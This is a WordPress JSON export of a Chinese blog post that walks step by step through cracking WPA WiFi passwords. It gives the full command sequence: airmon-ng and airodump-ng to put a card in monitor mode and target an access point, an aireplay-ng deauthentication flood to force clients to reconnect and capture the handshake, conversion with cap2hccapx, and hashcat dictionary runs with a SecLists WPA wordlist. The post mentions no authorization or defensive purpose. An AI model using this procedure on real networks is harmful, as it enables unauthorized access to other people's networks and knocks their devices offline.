{"id":434,"date":"2020-09-26T19:07:43","date_gmt":"2020-09-26T11:07:43","guid":{"rendered":"https:\/\/blog.73007300.xyz\/?p=434"},"modified":"2020-10-24T19:03:38","modified_gmt":"2020-10-24T11:03:38","slug":"wifi%e7%a0%b4%e8%a7%a3%e6%80%bb%e7%bb%93","status":"publish","type":"post","link":"https:\/\/blog.73007300.xyz\/?p=434","title":{"rendered":"WIFI\u7834\u89e3\u603b\u7ed3"},"content":{"rendered":"
\u601d\u8def\uff1a<\/div>\n
1. \u6293\u5305<\/div>\n
2. \u7834\u89e3<\/div>\n
<\/div>\n

1. \u6293\u5305<\/h2>\n

1.1. \u641c\u96c6\u4fe1\u606f<\/h3>\n
\u51c6\u5907\u4e00\u5757\u652f\u6301\u76d1\u542c\u6a21\u5f0f\u7684WIFI\u7f51\u5361\uff0c\u666e\u901a\u7b14\u8bb0\u672c\u4e0d\u652f\u6301\uff0c\u6dd8\u5b9d\u641c\u7d22 WIFI \u6e17\u900f \u7f51\u5361 \u5c31\u884c\u4e86\u3002<\/div>\n
\u88c5\u4e0a\u9a71\u52a8\uff0c\u63d2\u4e0a\u7f51\u5361\u3002<\/div>\n
\u5207\u6362\u5230 monitor \u6216 managed \u6a21\u5f0f<\/div>\n
\n
#\u542f\u52a8\u76d1\u63a7\u6a21\u5f0f\uff1a\uff08\u5176\u5b83\u7cfb\u7edf\u4e2d\u7f51\u5361\u540d\u5b57\u53ef\u80fd\u4e0d\u540c \u901a\u8fc7iwconfig\u67e5\u770b \uff09\nip link set wlan0 down\niwconfig wlan0 mode monitor\nip link set wlan0 up\nairodump-ng wlan0 \n#\u542f\u52a8\u6258\u7ba1\u6a21\u5f0f\uff1a\nip link set wlan0 down\niwconfig wlan0 mode managed\nip link set wlan0 up\n#\u91cd\u8981\u4fe1\u606f\uff1a\u5728Vmware\u4e2d\u4f7f\u7528Kali VM\u65f6\uff1a\u5c06Vmware\u4e2d\u7684USB\u8bbe\u7f6e\u4eceUSB 2.0\u66f4\u6539\u4e3aUSB 3.0\u3002<\/code><\/pre>\n<\/div>\n
\u786e\u4fdd\u6ca1\u522b\u7684\u7a0b\u5e8f\u5728\u7528<\/div>\n
\n
airmon-ng check kill<\/code><\/pre>\n<\/div>\n
\u67e5\u770b\u7f51\u5361\u540d\u5b57\uff1a<\/div>\n
\n
iwconfig<\/code><\/pre>\n<\/div>\n
<\/div>\n
\u542f\u52a8\u7f51\u5361\uff1a<\/div>\n
\n
airmon-ng start wlan0<\/code><\/pre>\n<\/div>\n
\u641c\u96c6WIFI\u4fe1\u606f\uff1a<\/div>\n
\n
airodump-ng wlan0<\/code><\/pre>\n<\/div>\n
<\/div>\n
\u4e3b\u8981\u641c\u96c6\u4ee5\u4e0b3\u4e2a\u4fe1\u606f\uff1a<\/div>\n
BSSID = AC:35:EE:15:8B:E2<\/div>\n
\u7f51\u5361MAC\u5730\u5740\uff0c\u4e0d\u7528\u591a\u8bf4<\/div>\n
CH = 6<\/div>\n
\u4fe1\u9053<\/div>\n
ESSID = DR-36670<\/div>\n
WIFI\u540d\u5b57<\/div>\n
<\/div>\n
PWR \u8d8a\u5927\u4ee3\u8868\u79bb\u5f97\u8d8a\u8fd1\uff0c-1\u4ee3\u8868\u4e0d\u652f\u6301<\/div>\n
<\/div>\n
Beacons \u4ee3\u8868\u6355\u83b7\u5230AP\u53d1\u7684\u5305\u6570<\/div>\n
<\/div>\n
1.2. \u542f\u52a8\u76d1\u542c<\/h3>\n
\u6a21\u62df\u76ee\u6807WIFI\uff0c\u542f\u52a8\u76d1\u542c\uff1a<\/div>\n
\n
airodump-ng --bssid AC:35:EE:15:8B:E2 -c 6 --write WPAcrack wlan0<\/code><\/pre>\n<\/div>\n
-c \u662f chanel\u7684\u610f\u601d<\/div>\n
--write \u662f\u4fdd\u5b58\u6293\u5230\u7684\u6570\u636e\u5305\u7684\u540d\u5b57<\/div>\n
\u7136\u540e\u6253\u5f00\u4e00\u4e2a\u65b0\u7684\u7ec8\u7aef\u3002<\/div>\n
<\/div>\n
1.3.\u00a0\u6293\u63e1\u624b\u5305<\/h3>\n
\u5f3a\u5236\u8ba9\u5df2\u8fde\u63a5\u7684\u8bbe\u5907\u4e0b\u7ebf\uff0c\u91cd\u65b0\u63e1\u624b\uff1a<\/div>\n
\n
aireplay-ng --deauth 100 -a AC:35:EE:15:8B:E2 wlan0<\/code><\/pre>\n<\/div>\n
-c \uff1a\u6307\u5b9a\u7528\u6237\u7684MAC\u5730\u5740<\/div>\n
\u770b2.\u7684\u7ec8\u7aef\uff0c<\/div>\n
\u5f53\u53f3\u4e0a\u89d2\u770b\u5230 handshake\u5c31\u4ee3\u8868\u6293\u5230\u4e86\uff1a<\/div>\n
<\/div>\n
\u56fe\u7247\u4e0b\u9762\u4ee3\u8868\u7684\u6293\u5e26\u4e86\u54ea\u4e9b\u8bbe\u5907\u7684\u63e1\u624b\u5305\u3002<\/div>\n
<\/div>\n
\u6293\u5230\u5305\uff0c\u81ea\u52a8\u5b58\u5230\u5f53\u524d\u76ee\u5f55\uff1a<\/div>\n
<\/div>\n
<\/div>\n
\u7136\u540e\u5c31\u53ef\u4ee5\u628a\u62ff\u5230\u7684\u63e1\u624b\u5305\u53bb\u8dd1\u5b57\u5178\u4e86\u3002<\/div>\n
<\/div>\n
2. \u7834\u89e3<\/h2>\n
2.1 CPU\u7834\u89e3<\/h3>\n
\u7528 AirCrack,\u8fd9\u79cd\u65b9\u5f0f\u6bd4\u8f83\u6162\u3002\u4e5f\u6709\u56fe\u5f62\u754c\u9762\uff0c\u6bd4\u8f83\u7b80\u5355\u7c97\u66b4\u3002\u6253\u5f00\u56fe\u5f62\u754c\u9762\uff0c\u8bbe\u7f6e\u597dcap\u5305\u548c\u5b57\u5178\uff0c\u8fd8\u6709WIFI\u7c7b\u578b\uff0c\u5c31\u53ef\u4ee5\u8dd1\u4e86\u3002<\/div>\n
<\/div>\n
\u7f3a\u70b9\u662f\u5f88\u6162\u3002<\/div>\n
2.2 GPU\u7834\u89e3<\/h3>\n
hashcai\u53ef\u4ee5\u7528GPU\u8dd1\u5b57\u5178\u5b9e\u6d4b\u7528 RTX2060\u7684\u663e\u5361 \u6bd4\u7528 R7 2700\u7684CPU\u5feb\u5f88\u591a\u500d\u3002<\/div>\n
2.2.1 \u9996\u5148\u628acap\u8f6c\u6362\u6210hccapx\u683c\u5f0f<\/h5>\n
\u5728\u7ebf\u8f6c\u7684\u7f51\u7ad9\uff1ahttps:\/\/hashcat.net\/cap2hccapx\/<\/div>\n
\u672c\u5730\u8f6c\u7684\u547d\u4ee4\uff1a<\/div>\n
<\/div>\n
git clone https:\/\/github.com\/hashcat\/hashcat-utils.git<\/span>\ncd hashcat-utils\/src<\/span>\nmake<\/span>\n.\/cap2hccapx.bin \/media\/pcap\/2603\/2603-02.cap \/media\/pcap\/2603\/2603-02.hccapx<\/span><\/pre>\n
2.2.2 \u914d\u7f6e\u73af\u5883<\/h5>\n
\u4e0b\u8f7d hashcat:<\/div>\n
https:\/\/hashcat.net\/hashcat\/<\/a><\/div>\n
\u8bbe\u7f6eWindows\u5185\u6838\u53c2\u6570\uff0cLinux\u73af\u5883\u5ffd\u7565\uff1a<\/div>\n
https:\/\/hashcat.net\/wiki\/doku.php?id=timeout_patch<\/a><\/div>\n
<\/div>\n
<\/div>\n
2.2.3\u00a0\u5f00\u59cb\u8dd1\u5b57\u5178<\/h5>\n
\n
.\\hashcat.exe -a 3 -m 2500 -w 3 E:\\********\\********.hccapx E:\\****\\SecLists\\Passwords\\WiFi-WPA\\probable-v2-wpa-top4800.txt<\/code><\/pre>\n<\/div>\n
\u00a0\u8fd9\u79cd\u7684\u8bdd\u4f1a\u628a\u6bcf\u4e00\u6b21\u5931\u8d25\u7684\u5c1d\u8bd5\u4e5f\u6253\u5370\u51fa\u6765\uff0c\u5982\u679c\u53ea\u60f3\u770b\u6210\u529f\u7684\u65e5\u5fd7\uff1a<\/div>\n
\n
.\\hashcat.exe -a 3 -m 2500 -w 3 E:\\********\\********.hccapx E:\\****\\SecLists\\Passwords\\WiFi-WPA\\probable-v2-wpa-top4800.txt --quiet<\/code><\/pre>\n<\/div>\n
-w 3 \u7684\u610f\u601d\u662f\u7528\u5f88\u9ad8\u7684GPU 1\u6700\u4f4e 4\u6700\u9ad8\u3002<\/div>\n
-a 3 \u7684\u662f\u610f\u601d\u662f\u66b4\u529b\u7834\u89e3<\/div>\n
-m 2500\u7684\u610f\u601d\u662f\u6a21\u5f0f<\/div>\n
\u5173\u4e8e\u7528\u4ec0\u4e48\u6a21\u5f0f \u53c2\u8003\uff1ahttps:\/\/hashcat.net\/wiki\/doku.php?id=frequently_asked_questions#how_can_i_identify_the_hash_type<\/div>\n
\u7ed3\u679c\u770b\u5f53\u524d\u76ee\u5f55\u7684potfile:<\/div>\n
<\/div>\n
<\/div>\n
\u8fd9\u91cc\u6709\u4e00\u4e2a\u6280\u5de7\uff0c\u5982\u679c\u8dd1\u7740\u8dd1\u7740\u65ad\u4e86\uff0c\u6bd4\u5982\u5f3a\u5236\u5173\u4e86\uff0c\u53ea\u8981\u5f53\u524d\u76ee\u5f55\u4e0b\u8fd8\u6709.restore\u6587\u4ef6\uff0c\u5c31\u53ef\u4ee5\u7ee7\u7eed\u8dd1\uff0c\u800c\u4e0d\u7528\u91cd\u65b0\u5f00\u59cb\uff1a<\/div>\n
<\/div>\n
\n
.\\hashcat.exe --restore<\/code><\/pre>\n<\/div>\n
<\/div>\n
\u5982\u679c\u8bf4\u5b57\u5178\u771f\u7684\u6bd4\u8f83\u5927\uff0c\u8981\u8dd1\u5f88\u4e45\uff0c\u5efa\u8bae\u5728\u53c2\u6570\u4e2d\u52a0\u4e0a --session \u53c2\u6570\uff1a<\/div>\n
\n
.\\hashcat.exe -a 3 -m 2500 -w 3 E:\\********\\********.hccapx E:\\****\\SecLists\\Passwords\\WiFi-WPA\\probable-v2-wpa-top4800.txt  --session test1 --quiet<\/code><\/pre>\n<\/div>\n
\u5373\u4f7f\u4e2d\u9014\u9000\u51fa\u4e86\uff0c\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\u5c31\u80fd\u6062\u590d\u4e86\uff1a<\/div>\n
\n
hashcat --session test1 --restore<\/code><\/pre>\n<\/div>\n
<\/div>\n
\u53c2\u8003\uff1ahttps:\/\/hashcat.net\/wiki\/doku.php?id=restore<\/a><\/div>\n
<\/div>\n
<\/div>\n
<\/div>\n
<\/div>\n
<\/div>\n","protected":false},"excerpt":{"rendered":"
\u601d\u8def\uff1a 1. \u6293\u5305 2. \u7834\u89e3 1. \u6293\u5305 1.1. \u641c\u96c6\u4fe1\u606f \u51c6\u5907\u4e00\u5757\u652f\u6301\u76d1\u542c\u6a21\u5f0f\u7684WIFI\u7f51\u5361\uff0c\u666e\u901a\u7b14\u8bb0\u672c\u4e0d\u652f\u6301\uff0c\u6dd8\u5b9d\u641c\u7d22 WIFI \u6e17\u900f \u7f51\u5361 \u5c31\u884c\u4e86\u3002 \u88c5\u4e0a\u9a71\u52a8\uff0c\u63d2\u4e0a\u7f51\u5361\u3002 \u5207\u6362\u5230 monitor \u6216 managed \u6a21\u5f0f #\u542f\u52a8\u76d1\u63a7\u6a21\u5f0f\uff1a\uff08\u5176\u5b83\u7cfb\u7edf\u4e2d\u7f51\u5361\u540d\u5b57\u53ef\u80fd\u4e0d\u540c \u901a\u8fc7iwconfig\u67e5\u770b \uff09 ip link set wlan0 down iwconfig wlan0 mode monitor ip link set wlan0 up airodump-ng wlan0 #\u542f\u52a8\u6258\u7ba1\u6a21\u5f0f\uff1a ip link set wlan0 down iwconfig wlan0 mode managed ip link set wlan0 up #\u91cd\u8981\u4fe1\u606f\uff1a\u5728Vmware\u4e2d\u4f7f\u7528Kali […]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,10],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/434"}],"collection":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=434"}],"version-history":[{"count":4,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/434\/revisions"}],"predecessor-version":[{"id":452,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/434\/revisions\/452"}],"wp:attachment":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=434"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=434"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=434"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}